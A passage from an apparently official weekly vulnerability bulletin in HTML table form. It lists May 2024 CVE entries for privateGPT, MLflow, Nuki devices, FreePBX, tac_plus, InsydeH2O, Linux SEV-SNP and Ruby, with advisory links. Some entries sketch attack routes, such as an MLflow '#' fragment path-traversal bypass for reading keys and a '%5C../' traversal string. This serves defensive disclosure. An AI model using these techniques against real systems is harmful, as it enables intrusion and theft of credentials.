<td>imartinez/privategpt version 0.2.0 is vulnerable to a local file inclusion vulnerability that allows attackers to read arbitrary files from the filesystem. By manipulating file upload functionality to ingest arbitrary local files, attackers can exploit the 'Search in Docs' feature or query the AI to retrieve or disclose the contents of any file on the system. This vulnerability could lead to various impacts, including but not limited to remote code execution by obtaining private SSH keys, unauthorized access to private files, source code disclosure facilitating further attacks, and exposure of configuration files.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3403" target="_blank">CVE-2024-3403</a><br><a href="https://huntr.com/bounties/7431d1dd-f014-4d4f-acb6-f97369ef3688" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>imartinez--imartinez/privategpt<br> </td>
<td>A stored Cross-Site Scripting (XSS) vulnerability exists in the 'imartinez/privategpt' repository due to improper validation of file uploads. Attackers can exploit this vulnerability by uploading malicious HTML files, such as those containing JavaScript payloads, which are then executed in the context of the victim's session when accessed. This could lead to the execution of arbitrary JavaScript code in the context of the user's browser session, potentially resulting in phishing attacks or other malicious actions. The vulnerability affects the latest version of the repository.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3851" target="_blank">CVE-2024-3851</a><br><a href="https://huntr.com/bounties/cae1a492-4e09-4d56-8e11-17703bdfe653" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>mlflow--mlflow/mlflow<br> </td>
<td>A path traversal vulnerability exists in mlflow/mlflow version 2.11.0, identified as a bypass for the previously addressed CVE-2023-6909. The vulnerability arises from the application's handling of artifact URLs, where a '#' character can be used to insert a path into the fragment, effectively skipping validation. This allows an attacker to construct a URL that, when processed, ignores the protocol scheme and uses the provided path for filesystem access. As a result, an attacker can read arbitrary files, including sensitive information such as SSH and cloud keys, by exploiting the way the application converts the URL into a filesystem path. The issue stems from insufficient validation of the fragment portion of the URL, leading to arbitrary file read through path traversal.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3848" target="_blank">CVE-2024-3848</a><br><a href="https://github.com/mlflow/mlflow/commit/f8d51e21523238280ebcfdb378612afd7844eca8" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/8d5aadaa-522f-4839-b41b-d7da362dd610" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>mlflow--mlflow/mlflow<br> </td>
<td>A broken access control vulnerability exists in mlflow/mlflow versions before 2.10.1, where low privilege users with only EDIT permissions on an experiment can delete any artifacts. This issue arises due to the lack of proper validation for DELETE requests by users with EDIT permissions, allowing them to perform unauthorized deletions of artifacts. The vulnerability specifically affects the handling of artifact deletions within the application, as demonstrated by the ability of a low privilege user to delete a directory inside an artifact using a DELETE request, despite the official documentation stating that users with EDIT permission can only read and update artifacts, not delete them.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4263" target="_blank">CVE-2024-4263</a><br><a href="https://github.com/mlflow/mlflow/commit/b43e0e3de5b500554e13dc032ba2083b2d6c94b8" target="_blank">security@huntr.dev</a><br><a href="https://huntr.com/bounties/bfa116d3-2af8-4c4a-ac34-ccde7491ae11" target="_blank">security@huntr.dev</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Extreme Networks EXOS before v.22.7 and before v.30.2 was discovered to contain an issue in its Web GUI which fails to restrict URL access, allowing attackers to access sensitive information or escalate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2020-18305" target="_blank">CVE-2020-18305</a><br><a href="https://gist.github.com/yasinyilmaz/1fe3fe58dd275edb77dcbe890fce2f2c" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>The T-Soft E-Commerce 4 web application is susceptible to SQL injection (SQLi) attacks when authenticated as an admin or privileged user. This vulnerability allows attackers to access and manipulate the database through crafted requests. By exploiting this flaw, attackers can bypass authentication mechanisms, view sensitive information stored in the database, and potentially exfiltrate data.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-28132" target="_blank">CVE-2022-28132</a><br><a href="https://www.exploit-db.com/exploits/50939" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. There is a buffer overflow over the encrypted token parsing logic in the HTTP service that allows remote code execution. This affects Nuki Bridge v1 before 1.22.0 and v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32502" target="_blank">CVE-2022-32502</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. An attacker with physical access to this JTAG port may be able to connect to the device and bypass both hardware and software security protections. This affects Nuki Keypad before 1.9.2 and Nuki Fob before 1.8.1.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32503" target="_blank">CVE-2022-32503</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. The code used to parse the JSON objects received from the WebSocket service provided by the device leads to a stack buffer overflow. An attacker would be able to exploit this to gain arbitrary code execution on a KeyTurner device. This affects Nuki Smart Lock 3.0 before 3.3.5 and 2.0 before 2.12.4, as well as Nuki Bridge v1 before 1.22.0 and v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32504" target="_blank">CVE-2022-32504</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. It is possible to send multiple BLE malformed packets to block some of the functionality and reboot the device. This affects Nuki Smart Lock 3.0 before 3.3.5 and Nuki Smart Lock 2.0 before 2.12.4.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32505" target="_blank">CVE-2022-32505</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. An attacker with physical access to the circuit board could use the SWD debug features to control the execution of code on the processor and debug the firmware, as well as read or alter the content of the internal and external flash memory. This affects Nuki Smart Lock 3.0 before 3.3.5, Nuki Smart Lock 2.0 before 2.12.4, as well as Nuki Bridge v1 before 1.22.0 and v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32506" target="_blank">CVE-2022-32506</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. Some BLE commands, which should have been designed to be only called from privileged accounts, could also be called from unprivileged accounts. This demonstrates that no access controls were implemented for the different BLE commands across the different accounts. This affects Nuki Smart Lock 3.0 before 3.3.5 and Nuki Smart Lock 2.0 before 2.12.4.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32507" target="_blank">CVE-2022-32507</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. By sending a malformed HTTP verb, it is possible to force a reboot of the device. This affects Nuki Bridge v1 before 1.22.0 and v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32508" target="_blank">CVE-2022-32508</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. Lack of certificate validation on HTTP communications allows attackers to intercept and tamper data. This affects Nuki Smart Lock 3.0 before 3.3.5, Nuki Bridge v1 before 1.22.0 and Nuki Bridge v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32509" target="_blank">CVE-2022-32509</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered on certain Nuki Home Solutions devices. The HTTP API exposed by a Bridge used an unencrypted channel to provide an administrative interface. A token can be easily eavesdropped by a malicious actor to impersonate a legitimate user and gain access to the full set of API endpoints. This affects Nuki Bridge v1 before 1.22.0 and v2 before 2.13.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-32510" target="_blank">CVE-2022-32510</a><br><a href="https://latesthackingnews.com/2022/07/28/multiple-security-flaws-found-in-nuki-smart-locks/" target="_blank">cve@mitre.org</a><br><a href="https://nuki.io/en/security-updates/" target="_blank">cve@mitre.org</a><br><a href="https://research.nccgroup.com/2022/07/25/technical-advisory-multiple-vulnerabilities-in-nuki-smart-locks-cve-2022-32509-cve-2022-32504-cve-2022-32502-cve-2022-32507-cve-2022-32503-cve-2022-32510-cve-2022-32506-cve-2022-32508-cve-2/" target="_blank">cve@mitre.org</a><br><a href="https://www.hackread.com/nuki-smart-locks-vulnerabilities-plethora-attack-options/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitary code via the company or query parameter(s).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-24203" target="_blank">CVE-2023-24203</a><br><a href="https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204" target="_blank">cve@mitre.org</a><br><a href="https://momonguyen.com/2023/cve-2023-24203/" target="_blank">cve@mitre.org</a><br><a href="https://www.sourcecodester.com/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SQL injection vulnerability in SourceCodester Simple Customer Relationship Management System v1.0 allows attacker to execute arbitrary code via the name parameter in get-quote.php.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-24204" target="_blank">CVE-2023-24204</a><br><a href="https://github.com/momo1239/CVE-2023-24203-and-CVE-2023-24204" target="_blank">cve@mitre.org</a><br><a href="https://momonguyen.com/2023/cve-2023-24203/" target="_blank">cve@mitre.org</a><br><a href="https://www.sourcecodester.com/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sangoma FreePBX 1805 through 2203 on Linux contains hardcoded credentials for the Asterisk REST Interface (ARI), which allows remote attackers to reconfigure Asterisk and make external and internal calls via HTTP and WebSocket requests sent to the API.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-26566" target="_blank">CVE-2023-26566</a><br><a href="https://qsecure.com.cy/resources/advisories/sangoma-freepbx-linux-hardcoded-credentials" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>phpok 6.4.003 is vulnerable to SQL injection in the function index_f() in phpok64/framework/api/call_control.php.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-29881" target="_blank">CVE-2023-29881</a><br><a href="https://gist.github.com/Northind/97522a49ae4bb0c8e6e2a49e75fd637a" target="_blank">cve@mitre.org</a><br><a href="https://github.com/qinggan/phpok/issues/15" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-40297" target="_blank">CVE-2023-40297</a><br><a href="https://github.com/sahar042/CVE-2023-40297" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have set incorrect file permission, which allows attackers to do code execution via modified bash and python scripts.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46870" target="_blank">CVE-2023-46870</a><br><a href="https://github.com/Chapoly1305/CVE-2023-46870" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Shrubbery tac_plus 2.x, 3.x. and 4.x through F4.0.4.28 allows unauthenticated Remote Command Execution. The product allows users to configure authorization checks as shell commands through the tac_plus.cfg configuration file. These are executed when a client sends an authorization request with a username that has pre-authorization directives configured. However, it is possible to inject additional commands into these checks because strings from TACACS+ packets are used as command-line arguments. If the installation lacks a a pre-shared secret (there is no pre-shared secret by default), then the injection can be triggered without authentication. (The attacker needs to know a username configured to use a pre-authorization command.) NOTE: this is related to CVE-2023-45239 but the issue is in the original Shrubbery product, not Meta's fork.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-48643" target="_blank">CVE-2023-48643</a><br><a href="https://github.com/takeshixx/tac_plus-pre-auth-rce" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>The IEEE 802.11 standard sometimes enables an adversary to trick a victim into connecting to an unintended or untrusted network with Home WEP, Home WPA3 SAE-loop. Enterprise 802.1X/EAP, Mesh AMPE, or FILS, aka an "SSID Confusion" issue. This occurs because the SSID is not always used to derive the pairwise master key or session keys, and because there is not a protected exchange of an SSID during a 4-way handshake.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52424" target="_blank">CVE-2023-52424</a><br><a href="https://mentor.ieee.org/802.11/dcn/24/11-24-0938-03-000m-protect-ssid-in-4-way-handshake.docx" target="_blank">cve@mitre.org</a><br><a href="https://www.top10vpn.com/assets/2024/05/Top10VPN-x-Vanhoef-SSID-Confusion.pdf" target="_blank">cve@mitre.org</a><br><a href="https://www.top10vpn.com/research/wifi-vulnerability-ssid/" target="_blank">cve@mitre.org</a><br><a href="https://www.wi-fi.org/news-events/press-releases" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22774" target="_blank">CVE-2024-22774</a><br><a href="https://blueteamalpha.com/blog/new-vulnerability-discovered-in-panoramic-x-ray-software/" target="_blank">cve@mitre.org</a><br><a href="https://github.com/Gray-0men/CVE-2024-22774" target="_blank">cve@mitre.org</a><br><a href="https://pancorp.com/index.html" target="_blank">cve@mitre.org</a><br><a href="https://pancorp.com/pdf/Panoramic-Dental-Imaging-%28GLAN%29-Windows-10x64-Setup-Rev3.pdf" target="_blank">cve@mitre.org</a><br><a href="https://pancorp.com/software/files/PANCORP_DENTAL_IMAGING_9.1.2.7600.exe" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting (XSS) vulnerability in CrushFTP v.10.6.0 and v.10.5.5 allows an attacker to execute arbitrary code via a crafted payload.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22910" target="_blank">CVE-2024-22910</a><br><a href="https://gist.github.com/cgnl/672ace3cbad1116fcd9ae633e54ea9f8" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Gnuboard g6 / https://github.com/gnuboard/g6 commit c2cc1f5069e00491ea48618d957332d90f6d40e4 is vulnerable to Cross Site Scripting (XSS) via board.py.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24157" target="_blank">CVE-2024-24157</a><br><a href="https://github.com/gnuboard/g6/issues/314" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A memory corruption vulnerability in StorageSecurityCommandDxe in Insyde InsydeH2O before kernel 5.2: IB19130163 in 05.29.07, kernel 5.3: IB19130163 in 05.38.07, kernel 5.4: IB19130163 in 05.46.07, kernel 5.5: IB19130163 in 05.54.07, and kernel 5.6: IB19130163 in 05.61.07 could lead to escalating privileges in SMM.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25078" target="_blank">CVE-2024-25078</a><br><a href="https://www.insyde.com/security-pledge" target="_blank">cve@mitre.org</a><br><a href="https://www.insyde.com/security-pledge/SA-2024001" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A memory corruption vulnerability in HddPassword in Insyde InsydeH2O kernel 5.2 before 05.29.09, kernel 5.3 before 05.38.09, kernel 5.4 before 05.46.09, kernel 5.5 before 05.54.09, and kernel 5.6 before 05.61.09 could lead to escalating privileges in SMM.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25079" target="_blank">CVE-2024-25079</a><br><a href="https://www.insyde.com/security-pledge" target="_blank">cve@mitre.org</a><br><a href="https://www.insyde.com/security-pledge/SA-2024001" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Oxygen XML Web Author v26.0.0 and older and Oxygen Content Fusion v6.1 and older are vulnerable to Cross-Site Scripting (XSS) for malicious URLs.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25662" target="_blank">CVE-2024-25662</a><br><a href="https://www.oxygenxml.com/security/advisory/SYNC-2024-020601.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25742" target="_blank">CVE-2024-25742</a><br><a href="https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9" target="_blank">cve@mitre.org</a><br><a href="https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f" target="_blank">cve@mitre.org</a><br><a href="https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f" target="_blank">cve@mitre.org</a><br><a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In the Linux kernel through 6.9, an untrusted hypervisor can inject virtual interrupts 0 and 14 at any point in time and can trigger the SIGFPE signal handler in userspace applications. This affects AMD SEV-SNP and AMD SEV-ES.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-25743" target="_blank">CVE-2024-25743</a><br><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2270836" target="_blank">cve@mitre.org</a><br><a href="https://bugzilla.suse.com/show_bug.cgi?id=1223307" target="_blank">cve@mitre.org</a><br><a href="https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>iPerf3 before 3.17, when used with OpenSSL before 3.2.0 as a server with RSA authentication, allows a timing side channel in RSA decryption operations. This side channel could be sufficient for an attacker to recover credential plaintext. It requires the attacker to send a large number of messages for decryption, as described in "Everlasting ROBOT: the Marvin Attack" by Hubert Kario.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-26306" target="_blank">CVE-2024-26306</a><br><a href="https://downloads.es.net/pub/iperf/esnet-secadv-2024-0001.txt.asc" target="_blank">cve@mitre.org</a><br><a href="https://github.com/esnet/iperf/releases/tag/3.17" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting vulnerability in Evertz microsystems MViP-II Firmware 8.6.5, XPS-EDGE-* Build 1467, evEDGE-EO-* Build 0029, MMA10G-* Build 0498, 570IPG-X19-10G Build 0691 allows a remote attacker to execute arbitrary code via a crafted payload to the login parameters.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-26367" target="_blank">CVE-2024-26367</a><br><a href="http://cc.com/" target="_blank">cve@mitre.org</a><br><a href="http://evertz.com/" target="_blank">cve@mitre.org</a><br><a href="https://wiki.notveg.ninja/blog/CVE-2024-26367/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SQL Injection vulnerability in School Task Manager v.1.0 allows a remote attacker to obtain sensitive information via a crafted payload to the delete-task.php component.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-26517" target="_blank">CVE-2024-26517</a><br><a href="https://github.com/unrealjbr/CVE-2024-26517" target="_blank">cve@mitre.org</a><br><a href="https://www.sourcecodester.com/php/16877/school-task-manager-using-php-source-code.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A buffer-overread issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x through 3.0.6 and 3.1.x through 3.1.4. The ungetbyte and ungetc methods on a StringIO can read past the end of a string, and a subsequent call to StringIO.gets may return the memory value. 3.0.3 is the main fixed version; however, for Ruby 3.0 users, a fixed version is stringio 3.0.1.1, and for Ruby 3.1 users, a fixed version is stringio 3.0.1.2.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27280" target="_blank">CVE-2024-27280</a><br><a href="https://hackerone.com/reports/1399856" target="_blank">cve@mitre.org</a><br><a href="https://www.ruby-lang.org/en/news/2024/03/21/buffer-overread-cve-2024-27280/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no restrictions on the classes that can be restored. (When loading the documentation cache, object injection and resultant remote code execution are also possible if there were a crafted cache.) The main fixed version is 6.6.3.1. For Ruby 3.0 users, a fixed version is rdoc 6.3.4.1. For Ruby 3.1 users, a fixed version is rdoc 6.4.1.1. For Ruby 3.2 users, a fixed version is rdoc 6.5.1.1.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27281" target="_blank">CVE-2024-27281</a><br><a href="https://hackerone.com/reports/1187477" target="_blank">cve@mitre.org</a><br><a href="https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in Ruby 3.x through 3.3.0. If attacker-supplied data is provided to the Ruby regex compiler, it is possible to extract arbitrary heap data relative to the start of the text, including pointers and sensitive strings. The fixed versions are 3.0.7, 3.1.5, 3.2.4, and 3.3.1.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27282" target="_blank">CVE-2024-27282</a><br><a href="https://hackerone.com/reports/2122624" target="_blank">cve@mitre.org</a><br><a href="https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
